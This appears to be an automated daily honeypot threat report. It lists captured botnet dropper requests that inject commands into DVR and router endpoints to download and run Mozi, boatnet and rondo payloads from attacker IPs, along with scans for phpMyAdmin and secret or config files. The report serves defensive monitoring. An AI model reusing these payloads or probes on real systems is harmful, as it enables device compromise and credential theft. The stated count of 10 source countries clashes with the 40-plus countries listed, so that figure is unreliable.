Report: 2025-06-16

Repport Daily
Author: Shoggoth Industries
Daily Report: 2025-06-16

Executive summary

Interaction report on the HTTP service of various honeypots around the world.

executive_summary

In today's report, we detected 10 stage 1 IP address(es), linked to 10 dropper URL(s).

There are 88 new requests that had never been observed before (these were added to the monitored request database).

A total of 1358 requests were recorded during the day, originating from 10 different countries, with a peak of 607 requests coming from the US.

ot_simplified_report

Simplified report for medium-level interactions with honeypots that mimic industrial systems (loading the web site, or interacting with it). For more, contact us at social@shoggoth.industries.

source_country | targeted_country
US | Dubai
US | Israel
CN | Georgia

botnet_dropper_behaviour

remote_addr | request
222.134.175.97 | 27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
104.167.221.114 | POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%20%7C%7C%20cd%20%2Fvar%2Frun%20%7C%7C%20cd%20%2Fmnt%20%7C%7C%20cd%20%2Froot%20%7C%7C%20cd%20%2F%3B%20wget%20http%3A%2F%2F104.167.221.114%2Ftbkdvr.sh%3B%20chmod%20777%20tbkdvr.sh%3B%20sh%20tbkdvr.sh%3B%20tftp%20104.167.221.114%20-c%20get%20tbkdvr1.sh%3B%20chmod%20777%20tbkdvr1.sh%3B%20sh%20tbkdvr1.sh%3B%20tftp%20-r%20tbkdvr2.sh%20-g%20104.167.221.114%3B%20chmod%20777%20tbkdvr2.sh%3B%20sh%20tbkdvr2.sh%3B%20ftpget%20-v%20-u%20anonymous%20-p%20anonymous%20-P%2021%20104.167.221.114%20tbkdvr1.sh%20tbkdvr1.sh%3B%20sh%20tbkdvr1.sh%3B%20rm%20-rf%20tbkdvr.sh%20tbkdvr1.sh%20tbkdvr2.sh%20tbkdvr1.sh HTTP/1.1
141.98.11.147 | GET /shell?cd+/tmp;iptables+-I+INPUT+-p+tcp+-s+141.98.11.147+--dport+5500+-j+ACCEPT;+iptables+-I+INPUT+-p+tcp+--dport+5500+-j+DROP;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/x86;chmod+777+;./x86+x86;cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/arm7;chmod+777+;./arm7+arm7;cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/arm4;chmod+777+;./arm4+arm4;cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/arm5;chmod+777+;./arm5+arm5 HTTP/1.1
141.98.11.83 | GET /shell?cd+/tmp;wget+http://94.26.90.251/payload1.sh+-O-+
45.135.194.34 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(killall+-9+mipsel+mpsl%3B%28wget+-O-+http%3A%2F%2F14.103.145.202%2Frondo.sh%7C%7Cbusybox+wget+-O-+http%3A%2F%2F14.103.145.202%2Frondo.sh%29+%7C+sh+-s+tplink%3B) HTTP/1.1
139.5.0.235 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://139.5.0.235:37799/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
144.172.116.95 | POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20boatnet.arm7%3B%20wget%20http%3A%2F%2F160.187.246.150%2Fhiddenbin%2Fboatnet.arm7%3B%20chmod%20777%20%2A%3B%20.%2Fboatnet.arm7%20tbk HTTP/1.1
87.121.84.34 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://31.59.40.187/x/tplink+-O-
45.135.194.34 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(killall+-9+mipsel+mpsl%3B%28wget+-O-+http%3A%2F%2F14.103.145.211%2Frondo.sh%7C%7Cbusybox+wget+-O-+http%3A%2F%2F14.103.145.211%2Frondo.sh%29+%7C+sh+-s+tplink%3B) HTTP/1.1
144.172.103.59 | POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20boatnet.arm7%3B%20wget%20http%3A%2F%2F160.187.246.111%2Fhiddenbin%2Fboatnet.arm7%3B%20chmod%20777%20%2A%3B%20.%2Fboatnet.arm7%20tbk HTTP/1.1

request

The requests listed here are those that had not yet been integrated into the request database.

number_of_occurence | request
2 | HEAD /web/phpMyAdmin/scripts/setup.php HTTP/1.1
2 | HEAD /phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.1
2 | GET /phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.1
2 | GET /admin/phpmyadmin/scripts/setup.txt HTTP/1.1
2 | HEAD /phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.1
2 | HEAD /SQL/scripts/setup.php HTTP/1.1
2 | GET /phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.1
2 | HEAD /phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.1
2 | HEAD /phpmanager/scripts/setup.php HTTP/1.1
2 | GET /secrets.GITHUB_ENV HTTP/1.1
2 | GET /env.yaml HTTP/1.1
2 | GET /aws-exports.js HTTP/1.1
2 | GET /smtp.properties HTTP/1.1
2 | GET /smtp-secret.yaml HTTP/1.1
2 | GET /webdb/scripts/setup.php HTTP/1.1
2 | GET /phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.1
2 | HEAD /phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.1
2 | GET /websql/scripts/setup.php HTTP/1.1
2 | HEAD /websql/scripts/setup.php HTTP/1.1
2 | GET /run/secrets/smtp_pass HTTP/1.1
2 | GET /smtp_config.sh HTTP/1.1
2 | GET /config.lua HTTP/1.1
2 | GET /config/email.conf HTTP/1.1
2 | GET /config/email.ts HTTP/1.1
2 | GET /src/config/smtp.ts HTTP/1.1
2 | GET /mail.properties HTTP/1.1
2 | GET /Rocket.toml HTTP/1.1
2 | GET /config/smtp.go HTTP/1.1
2 | GET /Config/DefaultEngine.ini HTTP/1.1
2 | GET /Assets/Scripts/SMTPConfig.cs HTTP/1.1
2 | GET /app.config.js HTTP/1.1
2 | HEAD /phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.1
2 | GET /lib/config.dart HTTP/1.1
2 | GET /_config.yml HTTP/1.1
2 | GET /config/plugins.js HTTP/1.1
2 | GET /config/initializers/email.rb HTTP/1.1
2 | GET /server/config.js HTTP/1.1
2 | GET /LocalConfiguration.php HTTP/1.1
2 | GET /functions.php HTTP/1.1
2 | HEAD /php/scripts/setup.php HTTP/1.1
2 | GET /phpMyAdmin-2.10.2/scripts/setup.php HTTP/1.1
2 | HEAD /phpmy-admin/scripts/setup.php HTTP/1.1
2 | GET /config/params.php HTTP/1.1
2 | GET /config/packages/mailer.yaml HTTP/1.1
2 | GET /app/Config/Email.php HTTP/1.1
2 | GET /vapor.yml HTTP/1.1
2 | GET /config/environments/development.rb HTTP/1.1
2 | GET /config/environments/production.rb HTTP/1.1
2 | HEAD /mysqlmanager/scripts/setup.php HTTP/1.1
2 | GET /app/config.py HTTP/1.1
2 | GET /config/mail.ts HTTP/1.1
2 | GET /src/config/mail.config.ts HTTP/1.1
2 | GET /config/smtp.js HTTP/1.1
2 | HEAD /admin/phpmyadmin/scripts/setup.txt HTTP/1.1
2 | GET /phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.1
2 | HEAD /phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.1
2 | HEAD /phpMyAdmin/scripts/setup.php HTTP/1.1
1 | HEAD /phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.1
1 | GET /phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.1
1 | GET /6ZuX HTTP/1.1
1 | GET /QNnO HTTP/1.1
1 | GET /phpMyAdmin2/scripts/setup.php HTTP/1.1
1 | GET /mysqlmanager/scripts/setup.php HTTP/1.1
1 | GET /odinhttpcall1750075093 HTTP/1.1
1 | GET /OdinHttpCall1750075093 HTTP/1.1
1 | GET /Odin/http/call1750075093 HTTP/1.1
1 | GET /phpma/scripts/setup.php HTTP/1.1
1 | HEAD /mysqladmin/scripts/setup.php HTTP/1.1
1 | HEAD /admin/pma/scripts/setup.php HTTP/1.1
1 | GET /admin/scripts/setup.php HTTP/1.1
1 | GET /phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.1
1 | HEAD /phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.1
1 | GET /phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.1
1 | HEAD /phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.1
1 | GET /phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.1
1 | HEAD /phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.1
1 | GET /phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.1
1 | GET /webadmin/scripts/setup.php HTTP/1.1
1 | GET /phpmanager/scripts/setup.php HTTP/1.1
1 | GET /sqlmanager/scripts/setup.php HTTP/1.1
1 | GET /SQL/scripts/setup.php HTTP/1.1
1 | GET /_phpMyAdmin/scripts/setup.php HTTP/1.1
1 | GET /phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.1
1 | HEAD /phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.1
1 | GET /phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.1
1 | GET /phpMyAdmin3/scripts/setup.php HTTP/1.1
1 | \x00\x0E\x08\x9D\xA6f\xEA\xAE[\x84\xBE\x00\x00\x00\x00\x00
1 | \x00\x0E8\x9D\xA6f\xEA\xAE[\x84\xBE\x00\x00\x00\x00\x00

country_iso_code

number_of_occurence | country_iso_code
607 | US
146 | DE
92 | ES
65 | CN
62 | NL
51 | BG
46 | FR
42 | SA
22 | LT
22 | VN
20 | PL
16 | SC
15 | KZ
15 | GB
14 | CA
14 | JP
13 | AU
12 | EG
10 | IL
9 | GH
8 | RU
7 | KR
6 | AO
5 | NG
4 | HK
4 | BE
3 | CH
3 | CZ
3 | IN
3 | SG
3 | BR
2 | IE
2 | RO
2 | MD
2 | MN
1 | TR
1 | KE
1 | PT
1 | PK
1 | IR
1 | CL
1 | ID
1 | AR
